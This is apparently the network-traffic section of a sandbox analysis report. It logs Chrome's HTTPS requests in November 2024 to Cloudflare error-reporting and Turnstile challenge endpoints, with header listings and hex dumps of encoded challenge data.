                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:17 UTC379INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 27 Nov 2024 14:15:17 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 7
                                                                                          Connection: close
                                                                                          cf-chl-out: 9dPew8ekuUfe49GivLM65bWuEhuYsAtan7g=$oKMfFoDqJUseqOZb
                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92babeba0442de-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                          Data Ascii: invalid


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.164973935.190.80.14435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:17 UTC474OUTPOST /report/v4?s=4ce7RThVQZpN7IE5xxKOe0P8S%2FBBHoh8iRb%2BghZ9wXUZrUs1f07CKzSk9AHtrWHxCj07mt7nKxptNhr04iq5WrdviuwnSLHWCcLvAMVDpYf7txsPzStGcJ4kTUQ9Gw%3D%3D HTTP/1.1
                                                                                          Host: a.nel.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          Content-Length: 432
                                                                                          Content-Type: application/reports+json
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:17 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 39 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 31 7a 2e 65 6e 73 66 75 6c 74 68 61 6c 2e 63 6f 6d 2f 6d 77 32 68 4e 34 6b 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 32 2e 31 33 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":896,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://1z.ensfulthal.com/mw2hN4k/","sampling_fraction":1.0,"server_ip":"104.21.52.130","status_code":404,"type":"http.error"},"type":"network-erro
                                                                                          2024-11-27 14:15:18 UTC168INHTTP/1.1 200 OK
                                                                                          Content-Length: 0
                                                                                          date: Wed, 27 Nov 2024 14:15:17 GMT
                                                                                          Via: 1.1 google
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.1649740104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:17 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8e92ba946dde8cec/1732716915077/hUzfX73lIZ5OJt- HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                          Sec-Fetch-Site: same-origin
                                                                                          Sec-Fetch-Mode: no-cors
                                                                                          Sec-Fetch-Dest: image
                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:18 UTC200INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:18 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 61
                                                                                          Connection: close
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92bac1f8608c1d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:18 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 08 08 02 00 00 00 f1 ce a1 bc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                          Data Ascii: PNGIHDR%IDAT$IENDB`


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.1649741104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:19 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8e92ba946dde8cec/1732716915077/hUzfX73lIZ5OJt- HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:19 UTC200INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:19 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 61
                                                                                          Connection: close
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92baccbc9419ae-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 08 08 02 00 00 00 f1 ce a1 bc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                          Data Ascii: PNGIHDR%IDAT$IENDB`


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.1649742104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:19 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8e92ba946dde8cec/1732716915079/bdcbeab1c83350eb0800e30560e9da0cfa42eeede4ecd68d3e23505d870a16af/339RObj6JSxOmMb HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: max-age=0
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: same-origin
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:20 UTC143INHTTP/1.1 401 Unauthorized
                                                                                          Date: Wed, 27 Nov 2024 14:15:19 GMT
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 1
                                                                                          Connection: close
                                                                                          2024-11-27 14:15:20 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 76 63 76 71 73 63 67 7a 55 4f 73 49 41 4f 4d 46 59 4f 6e 61 44 50 70 43 37 75 33 6b 37 4e 61 4e 50 69 4e 51 58 59 63 4b 46 71 38 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gvcvqscgzUOsIAOMFYOnaDPpC7u3k7NaNPiNQXYcKFq8AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                          2024-11-27 14:15:20 UTC1INData Raw: 4a
                                                                                          Data Ascii: J


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.1649743104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:21 UTC1174OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/402485251:1732713238:EPP0qg_mCX2wSLSk3LgW2rYMDy6RawIFteWI_N1yWy4/8e92ba946dde8cec/oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          Content-Length: 31672
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                          CF-Chl-RetryAttempt: 0
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          CF-Challenge: oxoBzRZd.2rPAaj3KTdMQYAfe03ZtWLPtKIgUvaVQmM-1732716910-1.1.1.1-ZdQvHX42IIDVzrlOFQN8fVuPzXoPXClRMRKYLY.Tl4cMaXpp_1EeO_rKdELfhZSM
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Origin: https://challenges.cloudflare.com
                                                                                          Sec-Fetch-Site: same-origin
                                                                                          Sec-Fetch-Mode: cors
                                                                                          Sec-Fetch-Dest: empty
                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:21 UTC16384OUTData Raw: 76 5f 38 65 39 32 62 61 39 34 36 64 64 65 38 63 65 63 3d 47 71 2d 4f 65 6a 72 48 37 76 64 70 71 70 33 6a 49 70 50 70 41 56 4c 72 30 76 72 44 70 4a 4f 73 64 34 73 61 70 69 4f 2d 64 72 4e 70 36 4f 6a 2d 70 46 47 70 6f 4f 76 78 4f 70 77 2d 70 6c 4f 4a 6f 4e 72 62 30 4f 72 30 4e 38 4a 70 73 36 42 2d 72 70 7a 4f 72 47 70 2d 31 65 2d 2d 24 55 6a 4c 70 48 4f 72 33 70 6b 35 37 34 75 57 79 32 52 72 36 59 46 4f 50 24 66 65 33 70 4e 7a 48 33 51 59 55 56 4c 70 6c 56 56 70 70 73 79 70 73 77 55 34 4c 4f 77 70 42 64 70 76 4f 70 66 77 4f 6a 66 47 34 4b 2d 70 4c 71 70 31 32 41 71 4c 36 73 7a 6a 48 62 4b 78 59 73 62 77 62 76 4c 5a 30 64 4e 34 70 70 24 77 63 70 57 78 57 6b 32 61 2d 69 4c 4c 33 62 44 58 70 25 32 62 56 4a 53 2d 2b 2b 57 65 43 36 55 74 47 68 64 2b 2d 55 59 57
                                                                                          Data Ascii: v_8e92ba946dde8cec=Gq-OejrH7vdpqp3jIpPpAVLr0vrDpJOsd4sapiO-drNp6Oj-pFGpoOvxOpw-plOJoNrb0Or0N8Jps6B-rpzOrGp-1e--$UjLpHOr3pk574uWy2Rr6YFOP$fe3pNzH3QYUVLplVVppsypswU4LOwpBdpvOpfwOjfG4K-pLqp12AqL6szjHbKxYsbwbvLZ0dN4pp$wcpWxWk2a-iLL3bDXp%2bVJS-++WeC6UtGhd+-UYW
                                                                                          2024-11-27 14:15:21 UTC15288OUTData Raw: 70 4e 4f 56 61 56 70 72 57 62 61 4f 5a 55 36 55 76 64 4c 59 52 69 2d 33 70 34 6d 33 6d 71 4f 70 6e 4c 76 70 6a 2d 70 67 70 73 68 70 4f 70 49 4f 73 4f 72 46 2d 61 70 4a 2d 70 7a 49 33 4e 50 55 70 30 55 4c 4f 42 78 72 48 70 53 70 2d 2d 70 6b 70 64 4f 76 37 6b 43 70 6a 4f 4e 37 6a 64 70 73 4f 34 37 34 31 70 45 4f 4e 2d 72 49 70 2d 70 72 64 34 66 70 45 4f 70 71 72 4f 78 56 6a 47 75 72 57 4f 63 33 56 71 72 48 70 5a 4f 4e 4c 34 70 4e 70 4f 4a 44 70 58 59 2b 70 4e 62 72 61 70 79 75 4c 69 4a 33 70 75 64 72 36 44 46 70 78 57 56 78 6a 4c 70 78 55 76 46 70 37 70 38 70 53 78 41 77 72 64 4e 2d 55 6a 44 71 57 55 76 46 72 6c 4f 53 70 55 2d 56 61 79 32 47 70 2d 34 48 55 71 4f 55 78 56 35 42 56 77 6a 37 4c 79 72 4c 64 56 55 6f 59 78 79 2d 50 77 24 48 4f 6e 24 35 74 71 6c
                                                                                          Data Ascii: pNOVaVprWbaOZU6UvdLYRi-3p4m3mqOpnLvpj-pgpshpOpIOsOrF-apJ-pzI3NPUp0ULOBxrHpSp--pkpdOv7kCpjON7jdpsO4741pEON-rIp-prd4fpEOpqrOxVjGurWOc3VqrHpZONL4pNpOJDpXY+pNbrapyuLiJ3pudr6DFpxWVxjLpxUvFp7p8pSxAwrdN-UjDqWUvFrlOSpU-Vay2Gp-4HUqOUxV5BVwj7LyrLdVUoYxy-Pw$HOn$5tql
                                                                                          2024-11-27 14:15:22 UTC330INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:22 GMT
                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                          Content-Length: 26320
                                                                                          Connection: close
                                                                                          cf-chl-gen: I8OC5NHEdhLb8uH5+7nEdkqtzVNs9rfLL+2VICbR1I8OEoJ2yr+FxbAScWbHlIQRfHroyi+dK+CHgFEG$E7q8nkLe3UHMlItv
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92bad9a9b10c96-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:22 UTC1039INData Raw: 65 31 31 67 5a 32 61 4d 55 4a 71 46 61 56 68 56 69 33 78 63 58 6f 78 7a 67 46 74 79 70 6f 68 66 64 71 6d 61 67 59 57 74 62 35 2b 44 66 34 35 7a 73 4c 43 75 67 6e 61 33 68 35 43 2f 6c 4a 79 50 73 4a 47 7a 64 35 47 51 73 70 79 5a 70 4b 69 69 6d 37 37 4f 6b 4d 57 6b 7a 4b 36 56 69 62 69 6d 6f 37 57 57 73 37 6d 39 71 62 47 33 76 70 2b 58 73 4d 4f 33 36 72 65 39 71 72 66 6d 32 71 37 62 71 63 72 6d 31 4c 62 78 39 64 6d 78 39 50 58 4d 2b 39 4c 4f 31 62 6a 76 2f 62 66 36 35 37 72 31 43 41 50 69 37 41 44 4c 37 76 34 49 44 63 38 4a 34 75 41 55 41 76 58 34 46 50 67 64 38 66 6a 73 33 41 38 6a 34 68 6b 67 38 79 4c 6e 4a 79 59 6c 4a 69 49 78 36 43 41 66 4d 69 58 75 49 69 48 35 4f 44 59 55 42 6a 77 68 48 2f 30 2f 46 78 63 6a 46 69 45 41 52 42 70 44 4b 6a 74 4b 53 77 39
                                                                                          Data Ascii: e11gZ2aMUJqFaVhVi3xcXoxzgFtypohfdqmagYWtb5+Df45zsLCugna3h5C/lJyPsJGzd5GQspyZpKiim77OkMWkzK6Vibimo7WWs7m9qbG3vp+XsMO36re9qrfm2q7bqcrm1Lbx9dmx9PXM+9LO1bjv/bf657r1CAPi7ADL7v4IDc8J4uAUAvX4FPgd8fjs3A8j4hkg8yLnJyYlJiIx6CAfMiXuIiH5ODYUBjwhH/0/FxcjFiEARBpDKjtKSw9
                                                                                          2024-11-27 14:15:22 UTC1369INData Raw: 31 65 35 71 41 6b 6f 4f 45 69 4a 4b 4b 64 32 4e 2b 5a 34 79 64 69 6f 53 76 71 58 53 4a 70 34 35 77 74 71 57 61 75 33 75 32 76 72 4f 70 73 72 69 7a 6c 4c 6d 2f 67 4a 2b 2f 79 36 57 2b 79 4d 4f 78 67 36 6d 66 6a 4e 48 54 71 70 62 4b 73 61 2b 6b 73 37 69 66 76 37 69 61 76 62 53 6a 6f 65 47 37 30 73 75 34 79 75 50 6c 77 64 76 74 37 4d 48 73 73 65 4c 6f 36 4b 76 44 33 4f 37 76 31 74 62 66 30 73 72 7a 39 4d 49 42 77 76 6e 71 38 76 6e 33 36 2f 77 47 7a 4f 58 70 37 75 30 4b 39 2b 49 4d 46 68 55 48 7a 68 30 58 38 68 6b 59 2f 42 66 36 39 78 76 69 2b 42 4d 44 34 79 51 4d 44 54 44 39 4c 67 34 79 4a 51 63 49 4c 52 67 35 44 67 6a 34 4f 78 45 53 4b 68 41 67 47 51 38 61 49 54 51 31 50 68 67 68 47 69 73 73 49 69 67 75 4b 77 59 67 52 55 6f 4b 4e 7a 55 6f 57 31 30 36 50 53
                                                                                          Data Ascii: 1e5qAkoOEiJKKd2N+Z4ydioSvqXSJp45wtqWau3u2vrOpsrizlLm/gJ+/y6W+yMOxg6mfjNHTqpbKsa+ks7ifv7iavbSjoeG70su4yuPlwdvt7MHsseLo6KvD3O7v1tbf0srz9MIBwvnq8vn36/wGzOXp7u0K9+IMFhUHzh0X8hkY/Bf69xvi+BMD4yQMDTD9Lg4yJQcILRg5Dgj4OxESKhAgGQ8aITQ1PhghGissIiguKwYgRUoKNzUoW106PS
                                                                                          2024-11-27 14:15:22 UTC1369INData Raw: 5a 6e 74 6a 71 61 47 42 65 49 68 33 68 57 35 70 61 6e 4f 49 74 61 74 31 75 4b 35 79 70 62 56 37 76 72 6d 36 77 58 74 2b 73 4a 47 62 74 5a 50 4b 6e 4d 79 34 72 49 2f 4d 76 34 71 73 7a 35 50 49 75 4d 6e 43 30 37 47 6c 32 73 36 33 30 72 62 44 6d 74 58 52 78 4f 4b 6f 30 63 61 71 34 4f 58 74 37 64 69 76 38 37 33 4d 39 62 62 59 38 75 58 4a 31 2b 2f 48 2f 62 2f 39 79 39 6a 54 2f 63 54 47 76 64 76 46 42 4d 6a 49 43 63 34 52 2f 64 34 41 43 2b 41 56 45 4f 6e 56 47 78 55 5a 38 4e 58 51 49 66 55 68 44 78 76 73 4a 77 44 32 38 53 55 56 41 77 73 75 4b 53 55 66 4d 67 63 78 4c 6a 59 78 43 7a 67 51 2b 69 59 50 4d 67 39 41 4e 76 34 77 41 76 59 46 2f 41 55 79 4d 78 38 74 49 69 63 42 43 78 41 6f 45 30 68 56 55 78 4a 4d 4d 7a 52 4f 55 78 51 79 46 6a 45 71 58 7a 30 7a 4e 54 74
                                                                                          Data Ascii: ZntjqaGBeIh3hW5panOItat1uK5ypbV7vrm6wXt+sJGbtZPKnMy4rI/Mv4qsz5PIuMnC07Gl2s630rbDmtXRxOKo0caq4OXt7div873M9bbY8uXJ1+/H/b/9y9jT/cTGvdvFBMjICc4R/d4AC+AVEOnVGxUZ8NXQIfUhDxvsJwD28SUVAwsuKSUfMgcxLjYxCzgQ+iYPMg9ANv4wAvYF/AUyMx8tIicBCxAoE0hVUxJMMzROUxQyFjEqXz0zNTt
                                                                                          2024-11-27 14:15:22 UTC1369INData Raw: 71 36 75 69 32 78 37 70 6f 43 44 68 58 2b 68 70 62 6d 36 64 33 32 50 6b 6e 70 2f 66 63 43 2b 74 35 32 64 6f 37 66 4b 6d 5a 54 4f 6f 4d 2b 77 30 5a 47 52 72 73 6d 53 6f 71 43 51 71 61 79 5a 74 39 2f 59 71 74 36 31 76 74 4b 65 30 72 72 52 36 63 44 47 34 75 62 58 32 4c 6d 73 37 63 72 6d 39 62 57 74 79 4c 47 73 7a 74 66 78 36 75 7a 74 33 62 7a 6a 41 4f 2f 61 36 41 6e 30 35 67 44 61 43 2b 51 46 44 4f 66 6e 38 2b 58 6a 38 39 62 4f 47 52 76 6c 47 2f 4d 57 38 78 67 56 37 76 66 69 47 52 50 65 48 68 7a 37 42 52 76 71 4b 69 77 6f 4a 77 2f 75 38 50 37 73 39 2f 55 45 4a 50 49 61 4b 78 77 7a 48 77 39 41 2f 41 38 65 47 7a 73 58 4f 53 73 45 4a 78 74 4d 51 77 6f 6d 4b 41 35 46 54 55 49 33 47 42 6f 32 4b 6c 6b 6e 57 78 39 50 54 79 4d 38 4f 6d 49 66 59 6d 70 49 4e 45 56 75
                                                                                          Data Ascii: q6ui2x7poCDhX+hpbm6d32Pknp/fcC+t52do7fKmZTOoM+w0ZGRrsmSoqCQqayZt9/Yqt61vtKe0rrR6cDG4ubX2Lms7crm9bWtyLGsztfx6uzt3bzjAO/a6An05gDaC+QFDOfn8+Xj89bOGRvlG/MW8xgV7vfiGRPeHhz7BRvqKiwoJw/u8P7s9/UEJPIaKxwzHw9A/A8eGzsXOSsEJxtMQwomKA5FTUI3GBo2KlknWx9PTyM8OmIfYmpINEVu
                                                                                          2024-11-27 14:15:22 UTC1369INData Raw: 61 67 70 35 57 4b 71 61 36 59 71 37 79 6f 6e 62 6a 42 6d 71 75 65 78 4c 32 44 6c 73 47 63 75 34 79 47 6f 6f 6d 34 30 73 33 41 76 49 33 41 7a 4c 62 5a 6d 5a 54 4d 72 5a 37 4d 74 4f 47 76 73 4d 4c 44 35 74 58 66 77 64 4f 2f 71 38 71 39 37 2f 48 70 76 2f 4c 71 30 37 37 42 35 4f 37 78 79 76 79 33 31 72 61 38 30 65 71 2f 39 50 44 35 2b 4c 72 6b 31 39 54 35 35 4e 66 6a 36 4f 6f 54 36 75 50 71 46 38 33 68 38 65 6e 34 42 66 63 53 46 79 49 50 41 75 7a 61 45 2b 45 46 43 68 51 65 48 50 6f 4e 44 75 63 73 44 51 49 56 37 52 4c 77 4e 79 77 69 43 78 6b 54 4b 44 4c 37 45 79 50 37 2b 30 59 67 41 51 67 48 4e 41 4e 44 4f 53 30 4a 4d 53 4d 75 4d 42 52 56 4d 54 56 4c 57 6b 49 71 4c 56 59 35 50 6a 56 43 50 54 42 62 59 30 4a 61 55 30 68 45 59 45 45 66 54 53 6c 76 58 6b 35 51 62
                                                                                          Data Ascii: agp5WKqa6Yq7yonbjBmquexL2DlsGcu4yGoom40s3AvI3AzLbZmZTMrZ7MtOGvsMLD5tXfwdO/q8q97/Hpv/Lq077B5O7xyvy31ra80eq/9PD5+Lrk19T55Nfj6OoT6uPqF83h8en4BfcSFyIPAuzaE+EFChQeHPoNDucsDQIV7RLwNywiCxkTKDL7EyP7+0YgAQgHNANDOS0JMSMuMBRVMTVLWkIqLVY5PjVCPTBbY0JaU0hEYEEfTSlvXk5Qb
                                                                                          2024-11-27 14:15:22 UTC1369INData Raw: 30 6b 49 65 34 64 70 78 36 72 49 4c 44 6b 72 57 50 73 5a 69 55 71 72 61 65 6c 35 65 37 6f 49 6d 66 76 4b 58 56 6f 4b 47 6f 74 4c 76 52 6c 73 7a 59 79 65 47 33 33 4c 2b 63 75 38 61 2b 73 2b 62 47 33 71 54 44 77 73 37 78 37 50 48 47 39 73 2f 53 32 66 72 37 78 39 72 4a 78 2f 6e 71 30 75 30 43 39 74 48 50 76 76 58 68 34 77 4c 39 32 64 72 62 2b 2b 49 44 41 66 7a 4d 31 52 58 77 30 2b 2f 79 2b 2b 67 4e 47 66 51 6a 39 2f 34 4f 4a 76 73 65 42 65 49 56 36 69 7a 36 48 76 63 61 41 66 77 54 48 77 63 41 41 43 51 4a 38 51 67 6c 44 6a 34 4a 43 68 45 64 4a 44 72 2b 4e 55 45 64 53 79 41 6a 4a 52 6c 4b 47 79 6b 4b 54 6c 55 7a 44 68 64 56 52 53 63 77 55 54 51 79 4f 45 41 35 4d 47 4a 69 57 43 41 78 51 45 45 35 52 43 77 32 50 46 39 45 53 55 70 4d 4b 32 6c 48 4e 33 46 55 4d 55
                                                                                          Data Ascii: 0kIe4dpx6rILDkrWPsZiUqrael5e7oImfvKXVoKGotLvRlszYyeG33L+cu8a+s+bG3qTDws7x7PHG9s/S2fr7x9rJx/nq0u0C9tHPvvXh4wL92drb++IDAfzM1RXw0+/y++gNGfQj9/4OJvseBeIV6iz6HvcaAfwTHwcAACQJ8QglDj4JChEdJDr+NUEdSyAjJRlKGykKTlUzDhdVRScwUTQyOEA5MGJiWCAxQEE5RCw2PF9ESUpMK2lHN3FUMU
                                                                                          2024-11-27 14:15:22 UTC1369INData Raw: 6c 34 47 66 66 4c 44 45 70 49 43 4a 78 4b 53 45 6f 73 79 72 69 38 32 71 73 4e 57 57 78 4c 50 5a 31 61 71 35 6c 4e 6d 79 7a 4a 69 68 34 4c 61 64 75 38 4c 45 6f 4b 71 2b 79 36 53 75 72 63 69 6f 73 74 4c 52 72 50 48 43 31 4c 44 6c 36 4e 61 33 2b 63 72 65 75 63 4c 65 31 37 33 47 34 75 4c 41 39 65 72 34 78 4f 50 75 36 63 67 4f 2f 4f 62 4e 31 52 58 77 30 4e 72 5a 39 42 34 61 36 76 72 59 44 76 62 38 33 53 4c 2b 42 4f 4d 6d 2b 67 58 6c 37 53 30 4f 36 42 34 48 42 2b 77 79 43 79 58 77 4a 67 73 62 39 66 34 66 48 66 6b 2b 49 79 4c 38 42 77 59 69 41 67 73 6a 4b 51 56 4b 4b 7a 42 53 54 69 73 79 45 46 49 6e 4e 52 46 57 4c 7a 59 57 48 79 73 7a 47 56 35 4e 55 52 35 69 4f 7a 77 69 5a 6c 6c 4b 4a 53 35 74 53 33 49 7a 4d 6b 30 75 59 6d 56 58 4d 56 42 4c 56 6a 5a 36 61 57 30
                                                                                          Data Ascii: l4GffLDEpICJxKSEosyri82qsNWWxLPZ1aq5lNmyzJih4Ladu8LEoKq+y6SurciostLRrPHC1LDl6Na3+creucLe173G4uLA9er4xOPu6cgO/ObN1RXw0NrZ9B4a6vrYDvb83SL+BOMm+gXl7S0O6B4HB+wyCyXwJgsb9f4fHfk+IyL8BwYiAgsjKQVKKzBSTisyEFInNRFWLzYWHyszGV5NUR5iOzwiZllKJS5tS3IzMk0uYmVXMVBLVjZ6aW0
